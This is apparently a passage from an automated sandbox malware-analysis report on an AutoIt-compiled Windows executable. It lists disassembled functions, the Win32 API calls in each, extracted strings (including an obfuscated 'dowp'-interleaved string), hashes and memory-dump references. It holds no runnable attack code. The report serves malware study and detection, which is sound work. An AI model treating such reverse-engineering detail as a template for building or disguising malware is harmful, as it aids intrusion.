                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                    • String ID: 0
                    • API String ID: 464785882-4108050209
                    • Opcode ID: 4375e54c2866febaad8ffc9ac244cdd1ac029a08f3163fb11202e14e0822a081
                    • Instruction ID: 2a922f2165ff82378a3b73503dcd1cf133edd61f128b8a365017e979e5fddc8b
                    • Opcode Fuzzy Hash: 4375e54c2866febaad8ffc9ac244cdd1ac029a08f3163fb11202e14e0822a081
                    • Instruction Fuzzy Hash: E112BF30604211EFDB15DF24C988BAAB7E1BF08304F54557EE855EB2A2C779E842CF99
                    Function 004774AB Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON
                    Download Yara Rule
                    APIs
                    • DestroyWindow.USER32(00000000), ref: 004774DE
                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0047759D
                    • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 004775DB
                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 004775ED
                    • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00477633
                    • GetClientRect.USER32(00000000,?), ref: 0047763F
                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00477683
                    • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00477692
                    • GetStockObject.GDI32(00000011), ref: 004776A2
                    • SelectObject.GDI32(00000000,00000000), ref: 004776A6
                    • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 004776B6
                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004776BF
                    • DeleteDC.GDI32(00000000), ref: 004776C8
                    • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004776F4
                    • SendMessageW.USER32(00000030,00000000,00000001), ref: 0047770B
                    • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00477746
                    • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0047775A
                    • SendMessageW.USER32(00000404,00000001,00000000), ref: 0047776B
                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 0047779B
                    • GetStockObject.GDI32(00000011), ref: 004777A6
                    • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 004777B1
                    • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 004777BB
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                    • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                    • API String ID: 2910397461-517079104
                    • Opcode ID: 39130e6e25830354a62f75781cb40fd4e4f8378a991d7811c774434fd18091c6
                    • Instruction ID: a65668349d9d90c20bc2e89cb33f711f17b366ce89c6f6fccfd6c75f405f0b1e
                    • Opcode Fuzzy Hash: 39130e6e25830354a62f75781cb40fd4e4f8378a991d7811c774434fd18091c6
                    • Instruction Fuzzy Hash: C2A18371A00605BFEB14DBA4DC49FAE7BB9EB04714F008129FA14A72E1C774AD44CB68
                    Function 0046AD10 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON
                    Download Yara Rule
                    APIs
                    • SetErrorMode.KERNEL32(00000001), ref: 0046AD1E
                    • GetDriveTypeW.KERNEL32(?,0048FAC0,?,\\.\,0048F910), ref: 0046ADFB
                    • SetErrorMode.KERNEL32(00000000,0048FAC0,?,\\.\,0048F910), ref: 0046AF59
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: ErrorMode$DriveType
                    • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                    • API String ID: 2907320926-4222207086
                    • Opcode ID: dc875c7f23c7d0eb2fd9c9e49e05cbe8264abdead4ae9aa7525ba1e7fefde2ed
                    • Instruction ID: e912c7b3330773d5b9bf2588ba7fbd63f6bfe130c5f6eb3342ce3002eb002758
                    • Opcode Fuzzy Hash: dc875c7f23c7d0eb2fd9c9e49e05cbe8264abdead4ae9aa7525ba1e7fefde2ed
                    • Instruction Fuzzy Hash: 2E5186B0648A059ACB04DB61C942DBE73A5EF48708730446FF406B7291EA3DAD62DF5F
                    Function 004068DC Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: __wcsnicmp
                    • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                    • API String ID: 1038674560-86951937
                    • Opcode ID: b4290111c942301d7081503a50e49f8e056f13ba1b39f80ed923a9f4a93e99e4
                    • Instruction ID: cb422ad940ebd99c4cbaeb9a9904d1c86e4c1b178c3cf2ebe63a60ccd5d4c750
                    • Opcode Fuzzy Hash: b4290111c942301d7081503a50e49f8e056f13ba1b39f80ed923a9f4a93e99e4
                    • Instruction Fuzzy Hash: 3281E3B07002156ADF10BA62EC42FAB3768AF15704F14403BF9067A1C2EB7CDA55C66D
                    Function 0048A8CA Relevance: 39.2, APIs: 26, Instructions: 187windowCOMMON
                    Download Yara Rule
                    APIs
                    • GetSysColor.USER32(00000012), ref: 0048A903
                    • SetTextColor.GDI32(?,?), ref: 0048A907
                    • GetSysColorBrush.USER32(0000000F), ref: 0048A91D
                    • GetSysColor.USER32(0000000F), ref: 0048A928
                    • CreateSolidBrush.GDI32(?), ref: 0048A92D
                    • GetSysColor.USER32(00000011), ref: 0048A945
                    • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0048A953
                    • SelectObject.GDI32(?,00000000), ref: 0048A964
                    • SetBkColor.GDI32(?,00000000), ref: 0048A96D
                    • SelectObject.GDI32(?,?), ref: 0048A97A
                    • InflateRect.USER32(?,000000FF,000000FF), ref: 0048A999
                    • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0048A9B0
                    • GetWindowLongW.USER32(00000000,000000F0), ref: 0048A9C5
                    • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0048A9ED
                    • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0048AA14
                    • InflateRect.USER32(?,000000FD,000000FD), ref: 0048AA32
                    • DrawFocusRect.USER32(?,?), ref: 0048AA3D
                    • GetSysColor.USER32(00000011), ref: 0048AA4B
                    • SetTextColor.GDI32(?,00000000), ref: 0048AA53
                    • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0048AA67
                    • SelectObject.GDI32(?,0048A5FA), ref: 0048AA7E
                    • DeleteObject.GDI32(?), ref: 0048AA89
                    • SelectObject.GDI32(?,?), ref: 0048AA8F
                    • DeleteObject.GDI32(?), ref: 0048AA94
                    • SetTextColor.GDI32(?,?), ref: 0048AA9A
                    • SetBkColor.GDI32(?,?), ref: 0048AAA4
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                    • String ID:
                    • API String ID: 1996641542-0
                    • Opcode ID: 477735c6bd52301878b185c76481b2a1a4b288ea4f41a62aa18eeb4dbc315d9d
                    • Instruction ID: 67910f5981194f54d32d2413a419bc6a22b5e02dd88e552ef27f67441b011758
                    • Opcode Fuzzy Hash: 477735c6bd52301878b185c76481b2a1a4b288ea4f41a62aa18eeb4dbc315d9d
                    • Instruction Fuzzy Hash: AD514F71901208FFDB10AFA4DC48EAE7B79EF08320F114A2AF911AB2A1D7759D54DF54
                    Function 004889D5 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON
                    Download Yara Rule
                    APIs
                    • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00488AC1
                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00488AD2
                    • CharNextW.USER32(0000014E), ref: 00488B01
                    • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00488B42
                    • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00488B58
                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00488B69
                    • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00488B86
                    • SetWindowTextW.USER32(?,0000014E), ref: 00488BD8
                    • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00488BEE
                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00488C1F
                    • _memset.LIBCMT ref: 00488C44
                    • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00488C8D
                    • _memset.LIBCMT ref: 00488CEC
                    • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00488D16
                    • SendMessageW.USER32(?,00001074,?,00000001), ref: 00488D6E
                    • SendMessageW.USER32(?,0000133D,?,?), ref: 00488E1B
                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00488E3D
                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00488E87
                    • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00488EB4
                    • DrawMenuBar.USER32(?), ref: 00488EC3
                    • SetWindowTextW.USER32(?,0000014E), ref: 00488EEB
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                    • String ID: 0
                    • API String ID: 1073566785-4108050209
                    • Opcode ID: 6d304d09a9ba669aeba86dcc0ed2949a670ea02e8edc27067d39c7658e1f624e
                    • Instruction ID: 787a5fb712104ee4b76f4ba17aa60975d6cacfa81cf9944a1fa1b3bb2a4fb8ea
                    • Opcode Fuzzy Hash: 6d304d09a9ba669aeba86dcc0ed2949a670ea02e8edc27067d39c7658e1f624e
                    • Instruction Fuzzy Hash: 44E1B370900218AFDB20AF51CC84EEF7BB9EF04710F50456FFA15AA290DB789985DF69
                    Function 0048488F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                    Download Yara Rule
                    APIs
                    • GetCursorPos.USER32(?), ref: 004849CA
                    • GetDesktopWindow.USER32 ref: 004849DF
                    • GetWindowRect.USER32(00000000), ref: 004849E6
                    • GetWindowLongW.USER32(?,000000F0), ref: 00484A48
                    • DestroyWindow.USER32(?), ref: 00484A74
                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00484A9D
                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00484ABB
                    • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00484AE1
                    • SendMessageW.USER32(?,00000421,?,?), ref: 00484AF6
                    • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00484B09
                    • IsWindowVisible.USER32(?), ref: 00484B29
                    • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00484B44
                    • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00484B58
                    • GetWindowRect.USER32(?,?), ref: 00484B70
                    • MonitorFromPoint.USER32(?,?,00000002), ref: 00484B96
                    • GetMonitorInfoW.USER32(00000000,?), ref: 00484BB0
                    • CopyRect.USER32(?,?), ref: 00484BC7
                    • SendMessageW.USER32(?,00000412,00000000), ref: 00484C32
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                    • String ID: ($0$tooltips_class32
                    • API String ID: 698492251-4156429822
                    • Opcode ID: 943f141a24a5701e169943524c067f38581a5f413d5e7729d13daee1db30ced1
                    • Instruction ID: 71fd3677379c23cac636b4aadb2286f0fe2b453109396d863f09e4e9c2446b6d
                    • Opcode Fuzzy Hash: 943f141a24a5701e169943524c067f38581a5f413d5e7729d13daee1db30ced1
                    • Instruction Fuzzy Hash: EFB15971604341AFDB04EF65C844A6FBBE4BF88314F008A2EF999AB291D775EC05CB59
                    Function 0046449A Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON
                    Download Yara Rule
                    APIs
                    • GetFileVersionInfoSizeW.VERSION(?,?), ref: 004644AC
                    • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 004644D2
                    • _wcscpy.LIBCMT ref: 00464500
                    • _wcscmp.LIBCMT ref: 0046450B
                    • _wcscat.LIBCMT ref: 00464521
                    • _wcsstr.LIBCMT ref: 0046452C
                    • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00464548
                    • _wcscat.LIBCMT ref: 00464591
                    • _wcscat.LIBCMT ref: 00464598
                    • _wcsncpy.LIBCMT ref: 004645C3
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                    • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                    • API String ID: 699586101-1459072770
                    • Opcode ID: b88462d4765e7d507f23171d62798ed34a372c9e6a155a9843904c144f7c25e8
                    • Instruction ID: 2b480a1fb6a64e9c247c6b56b60e40bdc72f3d5a191167641815a527c939035c
                    • Opcode Fuzzy Hash: b88462d4765e7d507f23171d62798ed34a372c9e6a155a9843904c144f7c25e8
                    • Instruction Fuzzy Hash: 7641D431A002107BDB14BA75AC43FBF77ACDF81714F50046FF905A6182FA7C9A4296AE
                    Function 004027D9 Relevance: 35.3, APIs: 18, Strings: 2, Instructions: 286windowtimeCOMMON
                    Download Yara Rule
                    APIs
                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 004028BC
                    • GetSystemMetrics.USER32(00000007), ref: 004028C4
                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 004028EF
                    • GetSystemMetrics.USER32(00000008), ref: 004028F7
                    • GetSystemMetrics.USER32(00000004), ref: 0040291C
                    • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00402939
                    • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00402949
                    • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0040297C
                    • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00402990
                    • GetClientRect.USER32(00000000,000000FF), ref: 004029AE
                    • GetStockObject.GDI32(00000011), ref: 004029CA
                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 004029D5
                      • Part of subcall function 00402344: GetCursorPos.USER32(?), ref: 00402357
                      • Part of subcall function 00402344: ScreenToClient.USER32(004C57B0,?), ref: 00402374
                      • Part of subcall function 00402344: GetAsyncKeyState.USER32(00000001), ref: 00402399
                      • Part of subcall function 00402344: GetAsyncKeyState.USER32(00000002), ref: 004023A7
                    • SetTimer.USER32(00000000,00000000,00000028,00401256), ref: 004029FC
                    Strings
                    • AutoIt v3 GUI, xrefs: 00402974
                    • 8dowpbdowpedowpcdowp8dowp1dowpedowpcdowp0dowp4dowp0dowp1dowp0dowp0dowp0dowp0dowp5dowp6dowp5dowp7dowp0dowpfdowp5dowp7dowpcdowp0dowp, xrefs: 0043C189
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                    • String ID: 8dowpbdowpedowpcdowp8dowp1dowpedowpcdowp0dowp4dowp0dowp1dowp0dowp0dowp0dowp0dowp5dowp6dowp5dowp7dowp0dowpfdowp5dowp7dowpcdowp0dowp$AutoIt v3 GUI
                    • API String ID: 1458621304-3509691525
                    • Opcode ID: 4ff91775ebca8baf8613358a2091c309939bc505a39819b9e80b7d3697c8673c
                    • Instruction ID: a18fd751d40b92a0f9ce74f9a4650c687106778ef47aaf7a4e9f1722fdb5861d
                    • Opcode Fuzzy Hash: 4ff91775ebca8baf8613358a2091c309939bc505a39819b9e80b7d3697c8673c
                    • Instruction Fuzzy Hash: 8AB15075600209EFDB14EFA8DD49BAE77B4FB08314F10463AFA15A62D0DB78A851CB58
                    Function 0045A439 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                    Download Yara Rule
                    APIs
                    • GetClassNameW.USER32(?,?,00000100), ref: 0045A47A
                    • __swprintf.LIBCMT ref: 0045A51B
                    • _wcscmp.LIBCMT ref: 0045A52E
                    • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0045A583
                    • _wcscmp.LIBCMT ref: 0045A5BF
                    • GetClassNameW.USER32(?,?,00000400), ref: 0045A5F6
                    • GetDlgCtrlID.USER32(?), ref: 0045A648
                    • GetWindowRect.USER32(?,?), ref: 0045A67E
                    • GetParent.USER32(?), ref: 0045A69C
                    • ScreenToClient.USER32(00000000), ref: 0045A6A3
                    • GetClassNameW.USER32(?,?,00000100), ref: 0045A71D
                    • _wcscmp.LIBCMT ref: 0045A731
                    • GetWindowTextW.USER32(?,?,00000400), ref: 0045A757
                    • _wcscmp.LIBCMT ref: 0045A76B
                      • Part of subcall function 0042362C: _iswctype.LIBCMT ref: 00423634
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061790179.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_UaOJAOMxcU.jbxd
                    Similarity
                    • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                    • String ID: %s%u
                    • API String ID: 3744389584-679674701
                    • Opcode ID: 70582c53a74fb19ef89f66ee8ee48de01d33c33058aefc90aeee9439ab50311f
                    • Instruction ID: eb4c2c17bfd361fdb29ac4d9e78bc58de04dd0089fb3858937583b9ed20721cb
                    • Opcode Fuzzy Hash: 70582c53a74fb19ef89f66ee8ee48de01d33c33058aefc90aeee9439ab50311f
                    • Instruction Fuzzy Hash: 06A1B431204606BFD714DF60C884BABB7E8FF44316F04462AFD99D2251D738E969CB9A
                    Function 0045AED4 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                    Download Yara Rule
                    APIs
                    • GetClassNameW.USER32(00000008,?,00000400), ref: 0045AF18
                    • _wcscmp.LIBCMT ref: 0045AF29
                    • GetWindowTextW.USER32(00000001,?,00000400), ref: 0045AF51
                    • CharUpperBuffW.USER32(?,00000000), ref: 0045AF6E
                    • _wcscmp.LIBCMT ref: 0045AF8C
                    • _wcsstr.LIBCMT ref: 0045AF9D
                    • GetClassNameW.USER32(00000018,?,00000400), ref: 0045AFD5
                    • _wcscmp.LIBCMT ref: 0045AFE5
                    • GetWindowTextW.USER32(00000002,?,00000400), ref: 0045B00C
                    • GetClassNameW.USER32(00000018,?,00000400), ref: 0045B055
                    • _wcscmp.LIBCMT ref: 0045B065
                    • GetClassNameW.USER32(00000010,?,00000400), ref: 0045B08D
                    • GetWindowRect.USER32(00000004,?), ref: 0045B0F6
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2061522397.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2061500145.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061644697.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061664234.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2061733214.0000000000523000.00000080.00000001.01000000.00000003.sdmpDownload File
